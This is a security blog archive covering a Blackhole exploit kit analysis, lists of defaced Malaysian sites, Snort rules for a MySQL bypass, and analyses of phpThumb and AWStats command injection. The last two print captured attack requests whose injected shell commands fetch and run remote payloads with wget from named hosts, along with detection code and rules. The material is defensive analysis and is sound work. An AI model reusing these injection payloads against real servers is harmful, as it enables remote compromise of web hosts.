Y.C's Blog

TO SHARE, TO LEARN

Posts Tagged ‘Technology’

Yahoo! Mail Now Supports HTTPS

According to the latest update from Yahoo! Help on January 1, 2013, Yahoo! Mail finally supports Hypertext Transfer Protocol Secure (HTTPS). It is not enabled by default, though, so please make sure you turn it on for your account right now!

How to enable HTTPS for your Yahoo! Mail account:
(1) Once you sign in, click the gear icon in the upper right corner and select Mail Options.
(2) By default you will now be in the General menu. Scroll down and, under Advanced Settings, check the box next to Turn on SSL.

Mail Options

Turn On SSL

According to Venkat, the browsers that currently support SSL for Yahoo! Mail on Windows are:

  • Internet Explorer 7.0 to 10.0 and newer
  • Chrome 5.0 and higher
  • Firefox 3.5 and higher
  • Safari 4.0 and newer

Till then, stay safe on the Internet!

Written by @YCOng

January 6, 2013 at 3:59 am

Analysis of a Blackhole Exploit Kit

Today I would like to share with you an analysis of a Blackhole exploit page (more on how to perform analysis).

Target of Analysis: http://xxx/go.php?d=3f34337dca7d6c7a

This Blackhole kit spreads via spammed email that tricks a potential victim into browsing a Blackhole exploit site, which then downloads a malicious payload onto the victim’s computer.

We can try two different approaches in this analysis.

First, we can browse the landing page while capturing the traffic with Wireshark, and then check the communication between our host and the exploit site. (Not recommended, unless we are doing it in an isolated environment or are pretty sure we won’t be compromised. =p)

Second, since most Blackhole exploit kits use JavaScript, we can use a generic JavaScript unpacker (you can try this). Submit the landing page URL to the site and we get both the obfuscated and the deobfuscated JavaScript in a few seconds. From there we can also obtain the malicious payload and upload it to VirusTotal to check whether it is detected by the AV vendors.

For this case, here is the result from VirusTotal: [1] and [2]

The malicious payloads are actually detected by more than 10 AV vendors. Furthermore, jsunpack also tells us the key vulnerability targeted by this Blackhole exploit kit, which is an Internet Explorer (IE) vulnerability, CVE-2006-0003.

One advantage of capturing the traffic is that we get a traffic flow summary, which shows what kinds of content were loaded when we visited the Blackhole landing page. Interestingly, the result we obtained is pretty similar to the one presented in the Sophos technical paper Exploring the Blackhole exploit kit (see page 12, written by Fraser Howard).

Blackhole traffic flow summary

*This can be useful for our analysis: we should know what is going on if we see these in the logs. (Ignore GET /favicon.ico.)

Another main feature of a Blackhole exploit page is the use of heavily obfuscated code, which aims to evade detection. If we use jsunpack, it automatically deobfuscates the code for us. We may also try automated tools such as Revelo by Kahu Security. However, bear in mind that automated tools are not always the best way to perform deobfuscation.

In case we need to deobfuscate the script (specifically JavaScript) manually, I recommend this page, since the very first step in deobfuscation is to beautify the code/script.

Part of obfuscated code

Part of deobfuscated code

*It looks like the script checks which browser is on the victim’s computer and then proceeds with further exploitation.

Also, the captured pcap file is very useful for checking whether the traffic between our host and the Blackhole landing page is detected by Snort IDS.

For this specific case, thanks to Nick Randolph for informing me that the Snort VRT has a signature in place for detection:
alert tcp $EXTERNAL_NET $FILE_DATA_PORTS -> $HOME_NET any (msg:"SPECIFIC-THREATS Blackhole landing page with specific structure - prototype catch"; flow:to_client,established; content:"prototype"; content:"}catch("; distance:0; pcre:"/prototype([^\x7d]{1,3})?\x7dcatch\x28/smi"; metadata:policy balanced-ips drop, policy security-ips drop, service http; reference:url,community.websense.com/blogs/securitylabs/pages/black-hole-exploit-kit.aspx; classtype:attempted-user; sid:21492; rev:12;)
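As an added illustration that is not part of the original post, the following Python replays the three matching parts of that VRT rule (the two ordered content options and the PCRE) against HTTP response bodies. The bodies are constructed here, not taken from the captured landing page, and the content matches are applied case-sensitively because the rule carries no nocase modifier.

```python
import re

# The three matching pieces of Snort SID 21492 as quoted above: two ordered
# content options that act as a cheap pre-filter, then the PCRE that decides.
CONTENT_1 = b"prototype"
CONTENT_2 = b"}catch("
# /prototype([^\x7d]{1,3})?\x7dcatch\x28/smi -> Python flags S (dotall), M, I
PCRE = re.compile(rb"prototype([^\x7d]{1,3})?\x7dcatch\x28", re.S | re.M | re.I)


def content_prefilter(body: bytes) -> bool:
    """Emulate 'content:"prototype"; content:"}catch("; distance:0;'.

    Snort content matches are case-sensitive unless 'nocase' is given (it is
    not here), and distance:0 means the second string must begin at or after
    the end of the first match rather than anywhere in the payload.
    """
    first = body.find(CONTENT_1)
    if first < 0:
        return False
    return body.find(CONTENT_2, first + len(CONTENT_1)) >= 0


def matches_sid_21492(body: bytes) -> bool:
    """Alert only when the pre-filter passes and the PCRE also matches."""
    return content_prefilter(body) and PCRE.search(body) is not None


def scan_responses(responses) -> list:
    """Names of the (name, body) pairs that would raise the alert."""
    return [name for name, body in responses if matches_sid_21492(body)]


# Constructed HTTP response bodies (not the captured landing page). Only the
# first has the 'prototype ... }catch(' shape the rule targets; the benign one
# contains both strings but with too much between them for the PCRE; the
# upper-case one would satisfy the /i PCRE yet fails the case-sensitive content.
SAMPLES = [
    ("landing_like", b"<script>try{q=window.prototype;}catch(ee){z=1}</script>"),
    ("benign", b"Array.prototype.push.call(a,1);try{g()}catch(e){}"),
    ("upper_case", b"TRY{PROTOTYPE}CATCH(E){}"),
    ("no_catch", b"String.prototype.trim=function(){return this}"),
]
```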

Hope you enjoy this analysis!

Written by @YCOng

July 21, 2012 at 10:30 am

#TorTorOPS – When Will It Stop?

Just a quick and short one: it seems there is no sign that #TorTorOPS will stop!

Here is the latest list of websites defaced under #TorTorOPS:

fattymok.com.my/ defaced by YaDoY666@ServerIsDown.Org
inspin.gov.my/x.htm defaced by Cyber Galau
kliksdesign.com.my/id/ defaced by m0eslim h4x0r
kliksniaga.my/ defaced by m0eslim h4x0r
mrsb.my/v2/ defaced by m0eslim h4x0r
naztech.com.my/v3/ defaced by m0eslim h4x0r
peraga.com.my/ defaced by m0eslim h4x0r
polistrg.gov.my/v3/ defaced by m0eslim h4x0r
servertrg.my/ defaced by m0eslim h4x0r
treetopwalk.com.my/ defaced by m0eslim h4x0r

Written by @YCOng

June 23, 2012 at 2:44 pm

#TorTorOPS, Continue to Dance?!

After the post on #TorTorOps, I crawled through the Internet and found some other websites with .MY domains defaced by our neighbours, the Indonesian hackers. I am not sure when these sites were defaced, but based on the defacement content all were done by Indonesian hackers, and some are in support of #TorTorOps.

1gold.com.my/?p=611 defaced by Nuxbie
advancefood.com.my defaced by Bl69
bersatu.my defaced by xrootx ft altiiever
billing.webdesign.my – unknown [in support of #TorTorOps]
esurge.net.my/nd.html defaced by Al3x 0wn5
gethosted.com.my – unknown [in support of #TorTorOps, special notes: YaDoY666@ServerIsDown]
herbsnfood.com.my/shop/images/img142.pjpeg hacked by Indonesian Coder Team
huihuanggroups.com.my – unknown [in support of #TorTorOps]
lightness.com.my defaced by Om Jin , BlackOne HaXor & AgoenkJr
sedo.com.my/indonesia.html hacked by Indonesian Coder Team
studyinmalaysia.com.my defaced by “#ALL INDONESIAN CYBER TEAM#”

Also, although the Football Association of Malaysia’s (FAM) official website has been recovered from the defacement, the hacker managed to place a file at fam.org.my/hack.php_hack19june2012, which the site admin still has not removed!

For all website administrators, I would like to share this quote with you:

“If you spend more on coffee than on IT security, you will be hacked. What’s more, you deserve to be hacked.” — Richard Clarke

FAM hacked

Written by @YCOng

June 21, 2012 at 11:55 am

#TorTorOPS, Let’s Dance?!

A statement made last week by the Malaysian Information, Communications and Culture Minister, Dato’ Seri Utama Dr. Rais Yatim, has riled up our neighbours, the Indonesians!

News reports said that Dato’ Seri Utama Dr. Rais Yatim stated the Tor-Tor dance and Gordang Sambilan drums would be acknowledged as national heritage and registered under Section 67 of the National Heritage Act 2005. This angered Indonesians, who claim that the Tor-Tor dance is their country’s cultural heritage. In response, Indonesian hackers turned their anger into a hacking operation known as #TorTorOps.

A notification from Zone-H this morning showed that the official website of the Malaysian Information, Communications and Culture Ministry had been defaced by Indonesian hackers.

We also found that quite a number of websites with .MY domains are affected. Basically these were done by a few groups or individual hackers: TeguhMicro, Indonesian Coder Team, onestree, Tanpa Name, Al3x 0wn5, BlackShadow and 46400.

#TorTorOPS

Here are the defaced websites [which I believe are part of #TorTorOPS]:
1sttarget.com.my defaced by TeguhMicro
bell.com.my/tmp defaced by 46400
emetal.com.my defaced by onestree
happystart.edu.my defaced by Tanpa Name
jcci.com.my defaced by onestree
jobsite.my defaced by Indonesian Coder Team
pdkjitra.gov.my defaced by Al3x 0wn5
rbtravel.com.my defaced by BlackShadow
semua.my defaced by Indonesian Coder Team
server.net.my defaced by Al3x 0wn5
shafaz.com.my defaced by BlackShadow
zhineng.com.my defaced by Indonesian Coder Team

Are you hosting a .MY domain? Be aware!

Snort to Detect MySQL Authentication Bypass Exploit

A serious security bug in MySQL and MariaDB was posted by Sergei Golubchik: there is a 1 in 256 chance that ANY password would be accepted for authentication. The flaw was caused by the assumption that the memcmp() function would always return a value within the range -127 to 127.

Yesterday, Jonathan Cran, Chief Technology Officer (CTO) of Pwnie Express, came out with a quick test program for libc’s memcmp to check for this MySQL flaw, which falls under CVE-2012-2122. Following this, HD Moore demonstrated the exploitation using the mysql_authbypass_hashdump module released with the latest Metasploit Framework. On the same day, SecurityTracker kept us up to date on this latest vulnerability, for which MySQL has issued fixes in versions 5.1.63, 5.5.24 and 5.6.6.

Test Program by Jonathan Cran

I have tried the latest mysql_authbypass_hashdump module, with the intention of studying the traffic behaviour of this exploit. As mentioned by Sergei Golubchik, if one knows a user name to connect with (and “root” almost always exists), she can connect using *any* password by repeating connection attempts. Based on this, we can figure out roughly what the exploit looks like on the wire.

To confirm, let’s have a look at part of the traffic captured by Wireshark during the exploit:

mysql_authbypass_hashdump as captured by Wireshark

The source is trying to establish an “abnormal” number of connections to your MySQL server (what counts as abnormal depends on your network) and tries to log in as “root” (the user name may differ). It is a kind of brute-force attempt, and each failed attempt causes your MySQL server to respond with “Response Error 1045”.

Based on this, we can conclude that these two existing rules from Emerging Threats are good enough to detect such an exploit.

alert tcp $EXTERNAL_NET any -> $HOME_NET 3306 (msg:"ET POLICY Suspicious inbound to mySQL port 3306"; flow:to_server; flags:S; threshold: type limit, count 5, seconds 60, track by_src; reference:url,doc.emergingthreats.net/2010937; classtype:bad-unknown; sid:2010937; rev:2;)

alert tcp $HOME_NET 3306 -> $EXTERNAL_NET any (msg:"ET SCAN Multiple MySQL Login Failures, Possible Brute Force Attempt"; flow:from_server,established; content:"|15 04|"; depth:64; content:"|32 38 30 30 30|Access denied for user|20|"; fast_pattern:only; content:"using password|3A 20|"; threshold: type threshold, track by_src, count 5, seconds 120; reference:url,doc.emergingthreats.net/2010494; classtype:attempted-recon; sid:2010494; rev:3;)
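As an added example (not code from the post, Metasploit or Emerging Threats), the following Python builds the MySQL error packet the server sends for each denied attempt, shows that the second rule's |15 04| and |32 38 30 30 30| content bytes are simply error 1045 and SQLSTATE 28000, and reimplements that rule's by-source threshold over a constructed burst of denials; the client address 198.51.100.7 is a placeholder.

```python
import struct

ER_ACCESS_DENIED_ERROR = 1045  # the "Response Error 1045" seen in the Wireshark capture


def build_access_denied_packet(user: str, host: str, seq: int = 2) -> bytes:
    """Constructed MySQL ERR packet, the shape the second ET rule keys on.

    Wire layout: 3-byte payload length (little-endian), 1-byte sequence id,
    0xFF marker, 2-byte error code (little-endian), '#', 5-char SQLSTATE, text.
    1045 little-endian is 15 04 and SQLSTATE "28000" is 32 38 30 30 30, which
    is exactly what the rule's |15 04| and |32 38 30 30 30| content bytes are.
    """
    text = "Access denied for user '%s'@'%s' (using password: YES)" % (user, host)
    payload = b"\xff" + struct.pack("<H", ER_ACCESS_DENIED_ERROR) + b"#28000" + text.encode()
    return struct.pack("<I", len(payload))[:3] + bytes([seq]) + payload


def parse_err_packet(packet: bytes):
    """Return (error_code, sqlstate, message), or None if this is not an ERR packet."""
    if len(packet) < 5 or packet[4] != 0xFF:
        return None
    length = int.from_bytes(packet[:3], "little")
    body = packet[4:4 + length]
    code = struct.unpack_from("<H", body, 1)[0]
    sqlstate, msg_start = None, 3
    if body[3:4] == b"#":               # SQLSTATE marker (protocol 4.1 and later)
        sqlstate, msg_start = body[4:9].decode(), 9
    return code, sqlstate, body[msg_start:].decode(errors="replace")


class AccessDeniedBurstDetector:
    """'threshold: type threshold, track by_src, count 5, seconds 120' as used by
    ET SID 2010494: one alert for every 5 denials a single client draws within
    a 120-second window, the counter re-arming after each alert."""

    def __init__(self, count: int = 5, seconds: int = 120):
        self.count, self.seconds = count, seconds
        self.state = {}                 # client ip -> (window start, denials so far)

    def observe(self, ts: float, client_ip: str, server_packet: bytes) -> bool:
        parsed = parse_err_packet(server_packet)
        if parsed is None or parsed[0] != ER_ACCESS_DENIED_ERROR:
            return False                # only 1045 responses count, as in the rule
        start, n = self.state.get(client_ip, (ts, 0))
        if ts - start > self.seconds:   # window expired: start counting afresh
            start, n = ts, 0
        n += 1
        fired = n >= self.count
        if fired:
            n = 0
        self.state[client_ip] = (start, n)
        return fired


def replay_bypass_attempts(attempts: int, client_ip: str = "198.51.100.7") -> list:
    """Feed the detector one constructed denial per second, the traffic pattern the
    repeated-connection bypass produces; return the attempt numbers that alert."""
    detector = AccessDeniedBurstDetector()
    pkt = build_access_denied_packet("root", client_ip)
    return [i for i in range(1, attempts + 1) if detector.observe(float(i), client_ip, pkt)]
```

The window bookkeeping is a simplified reading of Snort's threshold semantics (count, fire, re-arm), not a copy of its implementation.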

My advice is to make sure these two rules are enabled in your Snort IDS. And if you are running MySQL, what are you waiting for? Apply the patches now!

mysql_authbypass_hashdump by Metasploit

*Just before I posted this, I got another blog update from the VRT, where the team has released a signature (SQL MySQL/MariaDB client authentication bypass attempt, SID 23115) today to tackle this MySQL authentication bypass vulnerability.

Written by @YCOng

June 13, 2012 at 3:33 am

Symantec Network Breached

6th January 2012

  • Symantec confirmed that a hacking group has gained access to the source code of some of its security products.
  • The unidentified hacker, YamaTough, passed a file to Infosec Island.
  • The file was then handed by Infosec Island to Symantec for further investigation.
  • Cris Paden, Sr. Manager for Corporate Communications at Symantec confirmed that the file contained source code for the 2006 version of Symantec’s Norton antivirus product.

Symantec update on Facebook:
“Symantec can confirm that a segment of its source code used in two of our older enterprise products has been accessed, one of which has been discontinued. The code involved is four and five years old. This does not affect Symantec’s Norton products for our consumer customers. Symantec’s own network was not breached, but rather that of a third party entity. We are still gathering information on the details and are not in a position to provide specifics on the third party involved. Presently, we have no indication that the code disclosure impacts the functionality or security of Symantec’s solutions. Furthermore, there are no indications that customer information has been impacted or exposed at this time. However, Symantec is working to develop remediation process to ensure long-term protection for our customers’ information. We will communicate that process once the steps have been finalized. Given the early stages of the investigation, we have no further details to disclose at this time but will provide updates as we confirm additional facts.”

17th January 2012
Symantec admitted that the company was hacked in 2006.

According to Reuters:
“Paden said on Tuesday that an investigation into the matter had revealed that the company’s networks had indeed been compromised. We really had to dig way back to find out that this was actually part of a source code theft. We are still investigating exactly how it was stolen. The customers of pcAnywhere, a program that facilitates remote access of PCs, may face “a slightly increased security risk” as a result of the exposure. Symantec is currently in the process of reaching out to our pcAnywhere customers to make them aware of the situation and to provide remediation steps to maintain the protection of their devices and information.”

Statement by Cris Paden, Sr. Manager for Corporate Communications at Symantec:
“The 2006 attack presented no threat to customers using the most recent versions of Symantec’s software. They are protected against any type of cyber attack that might materialize as a result of this code.”

There are some voices out there which do not really agree with Cris Paden:
Laura DiDio, an analyst with ITIC (Reuters)
“Symantec’s customers should be concerned about the potential for hackers to use the stolen source code to figure out how to defeat some of the protections in Symantec’s software. What we are seeing from Symantec is ‘Let’s put the best public face on this’. Unless Symantec wrote all new code from scratch, there are going to be elements of source code in there that are still relevant today.”

Questions raised by Infosec Island
“Does this not imply that Symantec’s customers who were using the same security products were equally at risk of a serious network breach event in 2006? What about customers who used the products for which the source code was stolen in the event? Were they not at risk for the last six years?”

So, what are you waiting for? If you are using Symantec, you had better get it updated now!!!

Main References: Naked Security + all links as stated above

Written by @YCOng

January 19, 2012 at 4:30 pm

Apple: The Big Winner of 2011

With 2011 drawing to an end, let’s have a look at how crazy the world went for Apple throughout 2011.

In Google Zeitgeist 2011’s 10 Fastest-Rising Global Queries, 3 are Apple-related:

Rank 6 – iPhone 5
People used to call it the iPhone 5, expecting it to come after the iPhone 4. In the end, Apple released only the iPhone 4S, which sold more than 4 million units in the first three days after it was introduced.

Rank 9 – Steve Jobs
Steve Jobs, co-founder, chairman and chief executive officer of Apple Inc., died at his California home around 3 p.m. on October 5, 2011, leaving the world with Mac computers, iPods, iPhones and iPads.

Rank 10 – iPad2
The second-generation tablet from Apple Inc. Some estimated that between 400,000 and 500,000 iPad2 units were sold over the debut weekend.

At the same time, the iPhone topped Yahoo’s Top 10 Searches list and is the only gadget in the top 10; the rest are news events and people, including Casey Anthony, Jennifer Lopez, the Japan earthquake, etc.

On Twitter’s 2011 Year in Review site, Apple dominated the Tech category of the Hot Topics list, with the Mac App Store at the top, iPad at #6, iPhone at #7 and iPod at #10.

Also, according to Twitter’s top tweets-per-second figures, there were:
7,064 tweets per second when Steve Jobs resigned on 25 August 2011
6,049 tweets per second when Steve Jobs passed away on 6 October 2011

I can’t agree more with SJVN on this:
“You can talk all you want about other technologies and gadgets, but what everyone really wants to know about is Apple products, Apple technologies, and still more Apple.”

Just wondering, can the world survive without Apple?

Main Reference and Sources of Image: All links as stated above

Written by @YCOng

December 29, 2011 at 2:58 pm

phpThumb() “fltr[]” Command Injection Vulnerability

Hi... Right after the AWStats vulnerability scans, which lasted for several weeks, here comes a second old threat, seen over the past few days. Let’s have a look at it.

Here is part of the logs I extracted from the IDS:
URL:/components/com_hotornot2/phpthumb/phpThumb.php;  :protocol:http;  :field:fltr[];  :value:blur9 -quality  75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755 /tmp/barbut6;/tmp/barbut6;ps -aux; ;  :score:18;  :pam.injection.shell.score:4;  :pam.injection.shell.pedantic:true;  :pam.injection.argument.token.li:8

URL:/admin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php;  :protocol:http;  :field:fltr[];  :value:blur9 -quality  75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/f 67.19.79.203/f;killall -9 perl;perl /tmp/f; ;  :score:14;  :pam.injection.shell.score:4;  :pam.injection.shell.pedantic:true;  :pam.injection.argument.token.li:8;

The logs above are pretty similar to this one (below), which I extracted from IIS and which gives a clearer picture of what is actually going on:
GET /components/com_hotornot2/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk/barbut6;chmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.0" 404 326

Basically, it is a phpThumb vulnerability scan with embedded shell commands. The phpThumb vulnerability was first reported by Secunia in April 2010 [CVE-2010-1598] [http://secunia.com/advisories/39556/].

As reported by Secunia:
A vulnerability has been discovered in phpThumb(), which can be exploited by malicious people to compromise a vulnerable system. Input passed via the “fltr[]” parameter to phpThumb.php is not properly sanitised before being used in a command line argument. This can be exploited to inject and execute arbitrary shell commands via specially crafted requests.

The first part of the attack is to exploit the vulnerability in the phpThumb.php fltr[] parameter:
components/com_hotornot2/phpthumb/phpThumb.php?fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg

Once it has passed through the input validation, it will try to inject and execute shell commands. Based on what I observed, here are the two typical sets of shell commands:

Shell Command (1):
ls -l /tmp
wget -O /tmp/barbut6 bingoooo.co.uk/barbut6
chmod 0755 /tmp/barbut6
/tmp/barbut6
ps -aux

Shell Command (2):
ls -l /tmp
wget -O /tmp/f 67.19.79.203/f
killall -9 perl
perl /tmp/f

Let’s see what these commands are trying to do.
Shell Command (1):
ls -l /tmp
*lists all files in the tmp directory along with detailed information

wget -O /tmp/barbut6 bingoooo.co.uk/barbut6
*downloads the file barbut6 from bingoooo.co.uk

chmod 0755 /tmp/barbut6
*sets the permissions on barbut6, where:
755 – ugo
7 – full (read, write, execute)
5 – read and execute

u – user
g – group
o – others

/tmp/barbut6
*runs barbut6

ps -aux
*ps gives a snapshot of the current processes, where:
-a = tells ps to list the processes of all users on the system.
-u = tells ps to provide detailed information about each process.
-x = adds to the list processes that have no controlling terminal, such as daemons, which are programs launched during booting (i.e., computer startup) that run unobtrusively in the background until they are activated by a particular event or condition.

Shell Command (2):
ls -l /tmp
*lists all files in the tmp directory along with detailed information

wget -O /tmp/f 67.19.79.203/f
*downloads the file f from 67.19.79.203; I have no idea what “f” is

killall -9 perl
*kills all perl processes with signal 9, which is SIGKILL, as opposed to the default SIGTERM.
SIGKILL = the signal sent to a process to cause it to terminate immediately.
SIGTERM = the signal sent to a process to request its termination.

perl /tmp/f
*executes “f”

I tried to connect to both bingoooo.co.uk/barbut6 and 67.19.79.203/f, but both connections failed.

bingoooo.co.uk/barbut6 - Connection Failed

bingoooo.co.uk/barbut6 - 404 Not Found

IP Info 67.19.79.203:
NetRange:       67.18.0.0 - 67.19.255.255
OrgName:        ThePlanet.com Internet Services, Inc.
OrgId:          TPCM
Address:        315 Capitol
Address:        Suite 205
City:           Houston
StateProv:      TX
PostalCode:     77002
Country:        US

I have no exact answer as to what the shell commands are trying to do. However, based on what I have found so far, the intention of this attack is to download bots from bingoooo.co.uk and 67.19.79.203 respectively. Besides, I also found some forum posts mentioning that barbut6 is a process with high CPU utilization.

To ensure that we are safe from this vulnerability, please make sure phpThumb has been upgraded to the latest version available (1.7.11 or above).

Enjoy. =)

Main Reference: All links as stated above

Written by @YCOng

December 26, 2011 at 3:04 pm

AWStats Remote Command Execution Vulnerability

In the past few weeks we have seen the AWStats remote command execution vulnerability being widely exploited. At the time of writing I see no more scanning for this vulnerability, but I think it is still worth sharing this AWStats vulnerability with you here.

AWStats is a free, powerful and featureful tool that generates advanced web, streaming, ftp or mail server statistics, graphically. [http://awstats.sourceforge.net/] This vulnerability was reported by the SANS Internet Storm Center back in 2005 [http://isc.sans.edu/diary.html?date=2005-08-29]. We can also refer to [CVE-2005-0116].

From one of the sample logs extracted from Snort IDS, we found that the source is sending a hostile HTTP request to the target:

GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;mkdir%20.a;cd%20.a;wget%20http://fbi.php5.sk/qmail.tgz;tar%20-xzvf%20qmail.tgz;cd%20qmail;./start;echo%20;echo| HTTP/1.1

Via this specially crafted HTTP request, the attacker intends to exploit the bug that resides in the awstats.pl Perl script. The script does not correctly sanitise the user input for the ‘configdir’ parameter. When ‘awstats.pl’ is run as a CGI (Common Gateway Interface) script, it fails to validate specific inputs that are then used in a Perl open() function call. Note that the bug only affects AWStats version 6.2 and below. By exploiting this vulnerability, a remote attacker could supply AWStats with malicious input, potentially allowing the execution of arbitrary code WITH THE RIGHTS of the web server.

It would be rare for the signature to yield a false positive; however, ‘configdir’ can be used legitimately. For now, the most effective way to overcome this vulnerability is to upgrade to the latest version of AWStats (6.3 or later), which fixes the related bug. The latest stable version is 7.0.
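As an added example that covers both this AWStats request and the phpThumb fltr[] requests in the previous post (it is not code from either project or from the original posts), the following Python decodes a request line as it appears in the IIS or Snort logs, checks the abused parameter for injected shell syntax and splits it into the individual commands the way the posts list them by hand. The request lines are constructed after the logged ones, with the download hosts replaced by the placeholder payload.example.

```python
import re
from urllib.parse import unquote

# Per script: the parameter the posts show being abused, and the pattern that marks
# injected shell syntax in it. phpThumb's fltr[] legitimately contains '|' (blur|9),
# so only real command separators count there; awstats.pl hands configdir to a Perl
# open() call, where a leading or trailing '|' on its own turns the value into a pipe.
WATCHED = {
    "phpthumb.php": ("fltr[]", re.compile(r"[;`]|&&|\$\(")),
    "awstats.pl": ("configdir", re.compile(r"^\||\|$|[;`]|&&|\$\(")),
}


def parse_query(query: str) -> list:
    """Split on '&' only and percent-decode each side. parse_qsl is avoided on
    purpose: older Pythons also split on ';', which is exactly the byte we inspect."""
    pairs = []
    for chunk in query.split("&"):
        if chunk:
            name, _, value = chunk.partition("=")
            pairs.append((unquote(name), unquote(value)))
    return pairs


def decode_request(request_line: str) -> dict:
    """Method, script name and decoded parameters from a log's request line."""
    method, target, _ = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    return {"method": method,
            "script": path.rsplit("/", 1)[-1].lower(),
            "params": parse_query(query)}


def split_shell_commands(value: str) -> list:
    """Break an injected value on ';' into the individual commands, the way the
    posts list them; the first element is the carrier (filter spec or pipe opener)."""
    return [c.strip() for c in value.split(";") if c.strip()]


def find_injection(request_line: str):
    """Return (script, parameter, commands) for an injected request, else None."""
    req = decode_request(request_line)
    watched = WATCHED.get(req["script"])
    if watched is None:
        return None
    param, pattern = watched
    for name, value in req["params"]:
        if name == param and pattern.search(value):
            return req["script"], name, split_shell_commands(value)
    return None


# Constructed request lines modelled on the logged ones; payload.example is a placeholder.
SAMPLE_REQUESTS = [
    "GET /components/com_hotornot2/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality"
    "%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/"
    "barbut6%20payload.example/barbut6;chmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20"
    "&phpThumbDebug=9 HTTP/1.0",
    "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;mkdir%20.a;cd%20.a;wget%20http://"
    "payload.example/qmail.tgz;tar%20-xzvf%20qmail.tgz;cd%20qmail;./start;echo%20;echo| HTTP/1.1",
    "GET /phpThumb.php?src=cat.jpg&fltr[]=blur|3&w=120 HTTP/1.1",          # legitimate filter
    "GET /cgi-bin/awstats.pl?config=www.example.org&configdir=/etc/awstats HTTP/1.1",  # legitimate
]


def triage(request_lines) -> list:
    """(index, script, parameter, commands) for every request line carrying an injection."""
    hits = []
    for i, line in enumerate(request_lines):
        found = find_injection(line)
        if found:
            hits.append((i,) + found)
    return hits
```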

The AWStats vulnerability was detected by various kinds of devices (device: signature names):

  • Snort IDS: WEB-CGI awstats.pl configdir command execution attempt; ET WEB_SPECIFIC_APPS Awstats Remote Code Execution Attempt; ET WEB_SPECIFIC_APPS AWStats Totals sort parameter Remote Code Execution Attempt
  • Sourcefire IPS: WEB-CGI awstats access; WEB-CGI awstats.pl configdir command execution attempt
  • Cisco ASA IPS: AWStats configdir Command Exec
  • McAfee Intrushield IPS: HTTP: AWStats Remote Code Execution Failed; HTTP: AWStats Remote Code Execution May be successful
  • Juniper Intrusion Detection and Prevention: HTTP:CGI:AWSTATS
  • IBM ISS Proventia IPS: HTTP_AWStats_ConfigDir_Exec
  • ISS Network-Based IDS: HTTP_AWStats_ConfigDir_Exec; HTTP_AWStats_PluginMode_Exec

Based on my observation, the attack sources covered a wide range of regions, and I could not find any specific geographical trend. IMHO, in this case we cannot simply accuse the source of being the attacker, as there is a possibility that the source is itself a victim infected by malware designed specifically to exploit this AWStats vulnerability.

We can keep track of any security-related issues with AWStats via this website: http://www.awstats.org/awstats_security_news.php

Hope it helps. =)

Main Reference: All links as stated above

Written by @YCOng

December 26, 2011 at 11:30 am
